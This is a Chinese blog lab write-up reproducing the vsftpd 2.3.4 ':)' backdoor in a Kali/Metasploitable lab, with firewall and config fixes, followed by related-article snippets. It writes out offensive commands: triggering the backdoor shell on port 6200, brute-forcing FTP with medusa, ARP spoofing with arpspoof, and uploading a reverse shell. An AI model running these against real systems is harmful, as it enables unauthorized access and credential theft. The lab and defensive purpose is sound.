FTP笑脸漏洞

最新推荐文章于 2024-08-05 11:05:01 发布
最新推荐文章于 2024-08-05 11:05:01 发布
阅读量3.8k 收藏 22
点赞数 3
分类专栏: 漏洞实验
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44237647/article/details/104105607
版权

首先保证虚03拟机,kali虚拟机,metasploitable虚拟机主机相互ping的通。
FTP是C/S的模式。位于网络传输协议的应用层,21号端口通信。
03 ip 192.168.10.128
metasploitable ip 192.168.10.129 (简称meta)
kali ip 192.168.10.133
主机 ip 192.168.1.4
FTP在03,meta上搭建。

站点搭建
控制面板-》添加或删除程序-》添加删除组件-》应用程序服务器-》IIS的详细信息-》勾选FTP服务。
然后搭建的站点IIS中才会出现FTP站点

在kali上操作正常登陆
nc 192.168.10.128 21
user xxx
pass xxx
在kaili上匿名登陆
nc 192.168.10.128 21
user anonymous
pass 123 (密码输任意均可)
采用匿名登陆的方法
在这里插入图片描述
要勾选允许匿名连接
利用nmap探测漏洞笑脸漏洞
nmap --script=vuln -p 21 192.168.1.133
在这里插入图片描述
这就是笑脸漏洞,当FTP认证时,如果用户名中包含:) 则会出发监听6200号端接口的连接的shell
此时用nmap -p 6200 192.168.10.133查看连接情况
在这里插入图片描述
进行nc 192.168.10.133连接后
在这里插入图片描述
在这里插入图片描述
然后连接6200端口
在这里插入图片描述
完成漏洞利用
安全配置

防火墙 (解决后门)

iptables -A INPUT -p tcp -dport 6200 -j DROP
建立入站规则,不能从6200号端口进来
iptables -A OUTPUT -p tcp sport 6200 -j DROP
建立出站规则,不能从6200号端口出去

更改配置文件(解决匿名漏洞)

vsftp.conf allow_anonymous = no

FTP暴力破解
使用工具medusa(apt-get install medus)
medusa -h 192.168.10.128 -u admin1 -P /root/Desktop/dic.txt -M ftp
FTP嗅探(apt-get install dsniff)
(后来发现这个不成功,用另一台ubunt完成了这个实验,因为主机和kali不在同一网段)
使用arpspoof
arpsnoof - i eth0 192.168.1.1 -t 192.168.1.4
这里的ip是要欺骗的主机的网关和ip,eth0是kali的网卡。

FTP上传shell(在kali中生成,在主机中向03的FTP服务器上传)
使用setoolkit生成反弹shell。
通过xftp上传(一个软件)或者通过命令行上传
命令行
ftp 192.168.10.128
admin1
admin1
输入命令 PUT 文件路径
上传成功后
sessions -l 查看所有上传的连接
sessions - i 1 使用连接1

遇到的问题
错把03主机的Microsoft FTP Service当作笑脸漏洞。
FTP站点匿名登陆失败,重新安装了一遍成功了。

冬瓜小暖
关注
专栏目录
Ftp笑脸漏洞复现(后门漏洞
qq_55857040的博客
12-13 5725
目录 漏洞简介: 这个漏洞是开发者在软件中留下的后门漏洞,当连接带有vsftpd 2.3.4版本的服务器的21端口时,输入用户中带有“:) ”,密码任意,即可运行 vsf_sysutil_extra() :打开服务器的6200端口,并且不需要密码就能从6200端口以管理员身份登入目标服务器。因为输入用户名需要带有:),所以称笑脸漏洞 实验环境: 实验准备 实验过程 小总结 漏洞简介: 这个漏洞是开发者在软件中留下的后门漏洞,当连接带有vsftpd 2.3.4版本的服务器的...
ftp2.3.4(笑脸漏洞
lianhe20040122的博客
11-23 1172
扫描目标ip,查看是否存在漏洞,出现以下这些就代表存在。进行编译安装,出现以下这些东西,说明安装成功。,打开配置文件把这里修改为。查看是否启动,出现两个。文件,就需要自己创建在。目录下,并赋予执行权限。
:)笑脸漏洞
m0_62314360的博客
12-14 3582
VSFTPD v2.3.4 著名笑脸漏洞手工利用 Backdoor Command Execution:该版本的 VSFTPD 存在一个后门漏洞。虽然该问题迅速得到了开发人员的修复及删除,但是仍有不少人已经下载安装了该漏洞版本。这个后门的载荷以 :)字符的形式拼接在用户名上。后门代码绑定的侦听端口是 6200 打开Kali和靶机metasploitable2,在Kali中输入 netdiscover -r ip 来查看同一网段的靶机的ip 可以知道靶机的IP为192.168.38.132 输入.
FTP 未授权访问漏洞(匿名登陆)
最新发布
weixin_53736204的博客
08-05 695
FTP 弱口令或匿名登录漏洞,一般指使用 FTP 的用户启用了匿名登录功能,或系统口令的长度太短、复杂度不够、仅包含数字、或仅包含字母等,容易被黑客攻击,发生恶意文件上传或更严重的入侵行为。步骤一:对目标环境在资源管理器中用以下格式访问…如果该服务器开启了匿名登陆,则可直接进行内容查看。步骤一:添加ftp站点–>下一步---->分配IP无ssl----->匿名,匿名用户—>完成。虚拟机:windows server 2012。
笑脸漏洞(VSFTPD2.3.4)复现
aarong的博客
11-01 8477
笑脸漏洞(VSFTPD2.3.4)复现 漏洞服务:VSFTPD 2.3.4,俗称笑脸漏洞。存在于这个2.3.4版本,属于开发者设计上的失误。在检测到用户名带有特殊字符:)时,会自动打开6200端口。 攻击机:kali linux 靶机:Metasploitable2 复现过程 Nmap扫描同网断的靶机,观察靶机上的服务开放情况: nmap 192.168.43.0/24 发现靶机开放了21端口(Ftp协议),Nmap扫描出FTP服务的版本信息,扫描结果显示ftp服务版本为VSFTPD 2.3.4
笑脸:)漏洞
xujing19920814的博客
10-01 255
笑脸漏洞
python——脚本实现检测目标ip是否存在ftp笑脸漏洞ftp后门漏洞
m0_61408947的博客
04-17 1010
这是我花了几天的时间去把Python所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。别在网上瞎学了,我最近也做了一些资源的更新,只要你是我的粉丝,这期福利你都可拿走。
笑脸漏洞(vsftpd 2.3.4)
qq_52321992的博客
07-12 991
VSFTPD(Very Secure FTP Daemon)是一个常用的FTP服务器软件。“vsftpd 2.3.4 Backdoor”(也称为 “vsFTPd 2.3.4 Backdoor” 或 “vsftpd v2.3.4 backdoor”)。该漏洞最初于2011年被公开发现,影响了VSFTPD 2.3.4版本。这个版本中的一个后门(backdoor)允许攻击者通过一个特殊的用户名和密码组合来获得未经授权的访问权限。
vsftpd2.3.4笑脸漏洞
weixin_51909453的博客
11-02 4888
vsftpd2.3.4笑脸漏洞 该版本的 VSFTPD 存在一个后门漏洞。虽然该问题迅速得到了开发人员的修复及删除,但是仍有不少人已经下载安装了该漏洞版本。这个后门的载荷以 :)字符的形式拼接在用户名上。后门代码绑定的侦听端口是 6200 。 1、靶机metasploitable2,默认登录账号和密码都是:msfadmin,登录成功后ifconfig查看靶机ip192.168.179.129 2、打开kali首先输入sudo su ,输入当前用户密码即可切换root,利用nmap -sV 192.168.
笑脸漏洞(VSFTP2.3.4)复现
dgjkkhcf的博客
07-24 4963
在vsftpd2.3.4中在6200端口存在一个shell,使得任何人都可以进行连接,并且VSFTPD v2.3.4 服务,是以 root 权限运行的,最终获取到的权限也是root
Ftp笑脸漏洞(VSFTPD 2.3.4)复现(后门漏洞
m0_62670778的博客
05-10 1353
使用nmap扫描靶机的IP地址,可以看到靶机的21端口开放,且使用了VSFTPD,版本为2.3.4。nmap扫描端口6200,观察端口打开情况:已经开启。连接6200端口,成功以root身份登入。,连接靶机的21端口,输入user带有。选项是我们需要设置的,已经设置了,还需要设置。
网络空间安全-Kali Msfconsole-FTP笑脸漏洞:)介绍、渗透测试、使用
彪哥.TOP的博客
05-22 996
FTP笑脸漏洞,特别是与vsftpd 2.3.4版本相关的,是一个严重的安全漏洞,最初于2011年被公开发现。这个漏洞允许攻击者通过一个特殊的用户名和密码组合来获得未经授权的访问权限。具体来说,当连接带有vsftpd 2.3.4版本的服务器的21端口时,如果在用户名中输入带有“:)”的字符串(即笑脸表情的ASCII码表示),密码可以任意输入,即可触发该漏洞
vsftpd2.3.4著名笑脸漏洞复现实战
qq_55961856的博客
06-01 1294
1.vsftpd手工利用 攻击机kali:192.168.182.133 靶机metasploit:192.168.182.128 先ping一下靶机看看靶机是否存活 接着使用nmap对靶机进行信息收集 这里可以看到版本是vsftpd2.3.4 漏洞是存在的 直接ftp连接靶机 用户名:user:) 密码随意即可 这时靶机会开启6200端口 记下来nc或者telnet连接就可以了 最后直接可以获取到root权限了 2.MSF利用 打开终端输入msfconsole 这里也是简单的几步命令就能获得r
漏洞扫描(笑脸漏洞
zzzrrrppp的博客
11-21 3659
先查看自己的网段。扫描本网段是存活的主机。 发现Metasploitable2-Linux靶机。 查看ftp服务的版本。vsftpd 2.3.4 ·利用笑脸漏洞链接6200端口。
Vsftpd2.3.4环境搭建-漏洞利用(笑脸漏洞
qq_34914659的博客
08-09 3081
一、环境搭建 首先,需要找一个漏洞环境,通过fofa搜索"Vsftpd2.3.4",但是没有找到可以利用的环境,于是搭建环境 安装包在csdn上下载,需要50积分 https://download.csdn.net/download/sinat_32937525/11824028 1.靶机环境是centos7 ,首先解压缩包,并上传到靶机目录 tar -zxvf 压缩包名称 2.进入vsftpd目录,赋予文件权限,之后进行make &&a...
vsftpd笑脸漏洞
qq_70303095的博客
04-26 249
ftp笑脸漏洞原理在vsftpd2.3.4中在6200端口存在一个shell,使得任何人都可以进行连接,并且VSFTPD v2.3.4 服务,是以 root 权限运行的,最终获取到的权限也是root。
笑脸漏洞利用
m0_51617352的博客
12-15 3122
靶机metasploit :192.168.153.132 使用nmap对靶机进行信息收集 这里可以看到21端口是开放的,版本是vsftpd2.3.4,所以笑脸漏洞是存在的 直接ftp连接靶机 用户名:user:) 密码随便填写 这时靶机的6200端口会开启 接下来用nc连接即可 最后直接可以获取root权限了 原文链接:https://blog.csdn.net/m0_62210217/article/details/121085654 ...
python 制作ftp漏洞扫描
05-12
下面是一个基本的Python代码示例,可以用来扫描FTP服务器的漏洞: ```python import ftplib def check_ftp_vuln(hostname): try: ftp = ftplib.FTP(hostname) ftp.login('anonymous', 'anonymous') ftp.cwd('/.ssh') print('[+] ' + hostname + ' is vulnerable to FTP') ftp.quit() except Exception as e: print('[-] ' + hostname + ' is not vulnerable to FTP') check_ftp_vuln('ftp.example.com') ``` 这个脚本基于ftplib库,使用FTP协议连接到指定的主机。它尝试使用匿名登录来访问主机上的.ssh目录。如果成功访问,则表示主机存在FTP漏洞。否则,它会输出“[-] hostname is not vulnerable to FTP”。 请注意,这只是一个基本示例,不能检测所有可能的FTP漏洞。对于更复杂的扫描,您可能需要使用其他工具和技术来检测更多的漏洞
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值